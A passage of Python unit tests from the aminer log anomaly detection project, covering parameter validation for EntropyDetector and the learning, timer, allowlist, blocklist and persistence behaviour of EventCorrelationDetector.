self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=True) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id="") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=None) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=123.22) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id="Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=b"True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode="True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=123.22) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=None) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=b"True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline="True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=123.22) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=True) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=[""]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list="") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=123.3) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=[]) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=None) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=[""]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list="") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=123.3) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=[]) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=None) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list="") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=123.22) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=["file:///tmp/syslog"]) @staticmethod def add_data(string, freq, total_freq): for i, x in enumerate(string): num = ord(x) total_freq[num] = total_freq.get(num, 0) + 1 if i == 0: key = -1 else: key = ord(string[i - 1]) freq[key] = freq.get(key, {}) freq[key][num] = freq[key].get(num, 0) + 1 freq[ord(string[len(string) - 1])] = freq.get(ord(string[len(string) - 1]), {}) freq[ord(string[len(string) - 1])][-1] = freq[ord(string[len(string) - 1])].get(-1, 0) + 1 total_freq[-1] = total_freq.get(-1, 0) + 1 if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/EventCorrelationDetectorTest.py000066400000000000000000001551351500476301700320040ustar00rootroot00000000000000import unittest from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector, set_random_seed from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyFirstMatchModelElement, DummyMatchContext import time import random from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class EventCorrelationDetectorTest(TestBase): """Unittests for the EventCorrelationDetector.""" def test1receive_atom(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ # check if perfect examples are learned with default parameters ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff5[:12000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff1[:12000]) # the generation_probability and generation_factor are set to 0.5 in the first case and 0.1 in the second case with the perfect examples. # the EventCorrelationDetector should still learn the rules as expected. ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.5, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff5[:30000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.5, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff1[:30000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.3, generation_factor=0.3, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff5[:100000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.3, generation_factor=0.3, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff1[:100000]) # examples with errors are used, but still should be learned with the default parameters. ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff5[:12000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff1[:12000]) # examples with errors are used, but still should be learned. These tests are using a higher generation_probability and generation_factor, because the data contains errors. ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.7, generation_factor=0.99, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff5_low_error_rate[:25000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.7, generation_factor=0.99, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff1_low_error_rate[:25000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.95, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff5_low_error_rate[:40000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.95, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff1_low_error_rate[:40000]) # p0 and alpha are chosen carefully to only find safe assumptions about the implications in the data. Therefor more iterations in the training phase are needed. ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff5[:20000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff5_low_error_rate[:40000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff1[:20000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff1_low_error_rate[:40000]) # p0 and alpha are chosen to approximately find sequences in log data. Therefor not as many iterations are needed to learn the rules. ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff5[:10000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff5[:10000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff1[:10000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff1[:10000]) # stop_learning_time ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_time=100) t = time.time() match_context1 = DummyMatchContext(b" pid=") fdme1 = DummyFixedDataModelElement("s1", b" pid=") match_element1 = fdme1.get_match_element("", match_context1) match_context2 = DummyMatchContext(b"25537 uid=2") fdme2 = DummyFixedDataModelElement("d1", b"25537") match_element2 = fdme2.get_match_element("", match_context2) log_atom1 = LogAtom(fdme1.data, ParserMatch(match_element1), t, ecd) log_atom2 = LogAtom(match_context2.match_data, ParserMatch(match_element2), t, ecd) self.assertTrue(ecd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(ecd.receive_atom(log_atom1)) self.assertTrue(ecd.learn_mode) log_atom1.atom_time = t + 101 self.assertTrue(ecd.receive_atom(log_atom1)) self.assertFalse(ecd.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler]) t = time.time() ecd.next_persist_time = t + 400 self.assertEqual(ecd.do_timer(t + 200), 200) self.assertEqual(ecd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(ecd.do_timer(t + 999), 1) self.assertEqual(ecd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler]) analysis = "Analysis.%s" self.assertRaises(Exception, ecd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EventCorrelationDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, ecd.allowlist_event, analysis % ecd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(ecd.allowlist_event(analysis % ecd.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." % ("/s1", analysis % ecd.__class__.__name__)) self.assertEqual(ecd.constraint_list, ["/s1"]) ecd.learn_mode = False self.assertEqual(ecd.allowlist_event(analysis % ecd.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % ("/d1", analysis % ecd.__class__.__name__)) self.assertEqual(ecd.constraint_list, ["/s1", "/d1"]) def test4blocklist_event(self): """Test if the blocklist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler]) analysis = "Analysis.%s" self.assertRaises(Exception, ecd.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EventCorrelationDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, ecd.blocklist_event, analysis % ecd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(ecd.blocklist_event(analysis % ecd.__class__.__name__, "/s1", None), "Blocklisted path %s in %s." % ("/s1", analysis % ecd.__class__.__name__)) self.assertEqual(ecd.ignore_list, ["/s1"]) ecd.learn_mode = False self.assertEqual(ecd.blocklist_event(analysis % ecd.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." % ("/d1", analysis % ecd.__class__.__name__)) self.assertEqual(ecd.ignore_list, ["/s1", "/d1"]) def test5persistence(self): """Test the do_persist and load_persistence_data methods.""" ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff5[:12000]) ecd.do_persist() with open(ecd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[["string:back", ["string:parser/first/a"], ["string:parser/first/z"], 500, 500], ["string:back", ["string:parser/first/b"], ["string:parser/first/a"], 500, 500], ["string:back", ["string:parser/first/c"], ["string:parser/first/b"], 500, 500], ["string:back", ["string:parser/first/d"], ["string:parser/first/c"], 500, 500], ["string:back", ["string:parser/first/e"], ["string:parser/first/d"], 500, 500], ["string:back", ["string:parser/first/f"], ["string:parser/first/e"], 500, 500], ["string:back", ["string:parser/first/g"], ["string:parser/first/f"], 500, 500], ["string:back", ["string:parser/first/h"], ["string:parser/first/g"], 500, 500], ["string:back", ["string:parser/first/i"], ["string:parser/first/h"], 500, 500], ["string:back", ["string:parser/first/j"], ["string:parser/first/i"], 500, 500], ["string:back", ["string:parser/first/k"], ["string:parser/first/j"], 500, 500], ["string:back", ["string:parser/first/l"], ["string:parser/first/k"], 500, 500], ["string:back", ["string:parser/first/m"], ["string:parser/first/l"], 500, 500], ["string:back", ["string:parser/first/n"], ["string:parser/first/m"], 500, 500], ["string:back", ["string:parser/first/o"], ["string:parser/first/n"], 500, 500], ["string:back", ["string:parser/first/p"], ["string:parser/first/o"], 500, 500], ["string:back", ["string:parser/first/q"], ["string:parser/first/p"], 500, 500], ["string:back", ["string:parser/first/r"], ["string:parser/first/q"], 500, 500], ["string:back", ["string:parser/first/s"], ["string:parser/first/r"], 500, 500], ["string:back", ["string:parser/first/t"], ["string:parser/first/s"], 500, 500], ["string:back", ["string:parser/first/u"], ["string:parser/first/t"], 500, 500], ["string:back", ["string:parser/first/v"], ["string:parser/first/u"], 500, 500], ["string:back", ["string:parser/first/w"], ["string:parser/first/v"], 500, 500], ["string:back", ["string:parser/first/x"], ["string:parser/first/w"], 500, 500], ["string:back", ["string:parser/first/y"], ["string:parser/first/x"], 500, 500], ["string:back", ["string:parser/first/z"], ["string:parser/first/y"], 500, 500], ["string:forward", ["string:parser/first/a"], ["string:parser/first/b"], 500, 500], ["string:forward", ["string:parser/first/b"], ["string:parser/first/c"], 500, 500], ["string:forward", ["string:parser/first/c"], ["string:parser/first/d"], 500, 500], ["string:forward", ["string:parser/first/d"], ["string:parser/first/e"], 500, 500], ["string:forward", ["string:parser/first/e"], ["string:parser/first/f"], 500, 500], ["string:forward", ["string:parser/first/f"], ["string:parser/first/g"], 500, 500], ["string:forward", ["string:parser/first/g"], ["string:parser/first/h"], 500, 500], ["string:forward", ["string:parser/first/h"], ["string:parser/first/i"], 500, 500], ["string:forward", ["string:parser/first/i"], ["string:parser/first/j"], 500, 500], ["string:forward", ["string:parser/first/j"], ["string:parser/first/k"], 500, 500], ["string:forward", ["string:parser/first/k"], ["string:parser/first/l"], 500, 500], ["string:forward", ["string:parser/first/l"], ["string:parser/first/m"], 500, 500], ["string:forward", ["string:parser/first/m"], ["string:parser/first/n"], 500, 500], ["string:forward", ["string:parser/first/n"], ["string:parser/first/o"], 500, 500], ["string:forward", ["string:parser/first/o"], ["string:parser/first/p"], 500, 500], ["string:forward", ["string:parser/first/p"], ["string:parser/first/q"], 500, 500], ["string:forward", ["string:parser/first/q"], ["string:parser/first/r"], 500, 500], ["string:forward", ["string:parser/first/r"], ["string:parser/first/s"], 500, 500], ["string:forward", ["string:parser/first/s"], ["string:parser/first/t"], 500, 500], ["string:forward", ["string:parser/first/t"], ["string:parser/first/u"], 500, 500], ["string:forward", ["string:parser/first/u"], ["string:parser/first/v"], 500, 500], ["string:forward", ["string:parser/first/v"], ["string:parser/first/w"], 500, 500], ["string:forward", ["string:parser/first/w"], ["string:parser/first/x"], 500, 500], ["string:forward", ["string:parser/first/x"], ["string:parser/first/y"], 500, 500], ["string:forward", ["string:parser/first/y"], ["string:parser/first/z"], 500, 500], ["string:forward", ["string:parser/first/z"], ["string:parser/first/a"], 500, 500]]') other = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) for key in ecd.back_rules.keys(): for i in range(len(ecd.back_rules[key])): self.assertEqual(ecd.back_rules[key][i].trigger_event, other.back_rules[key][i].trigger_event) self.assertEqual(ecd.back_rules[key][i].implied_event, other.back_rules[key][i].implied_event) self.assertEqual(ecd.back_rules[key][i].max_observations, other.back_rules[key][i].max_observations) self.assertEqual(ecd.back_rules[key][i].min_eval_true, other.back_rules[key][i].min_eval_true) for key in ecd.forward_rules.keys(): for i in range(len(ecd.forward_rules[key])): self.assertEqual(ecd.forward_rules[key][i].trigger_event, other.forward_rules[key][i].trigger_event) self.assertEqual(ecd.forward_rules[key][i].implied_event, other.forward_rules[key][i].implied_event) self.assertEqual(ecd.forward_rules[key][i].max_observations, other.forward_rules[key][i].max_observations) self.assertEqual(ecd.forward_rules[key][i].min_eval_true, other.forward_rules[key][i].min_eval_true) def test6validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, ["default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, None) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, "") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, True) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, 123) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, 123.3) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, {"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, ()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, set()) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=[""]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list="") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=True) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123.3) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=[]) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=None) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_hypotheses=-1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_hypotheses=0) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_hypotheses=100.22) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_hypotheses=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_hypotheses="123") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_hypotheses={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_hypotheses=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_hypotheses=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_hypotheses=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_hypotheses=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], max_hypotheses=100) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypothesis_max_delta_time=-1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypothesis_max_delta_time=0) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypothesis_max_delta_time=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypothesis_max_delta_time="123") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypothesis_max_delta_time={"id": "Default"}) 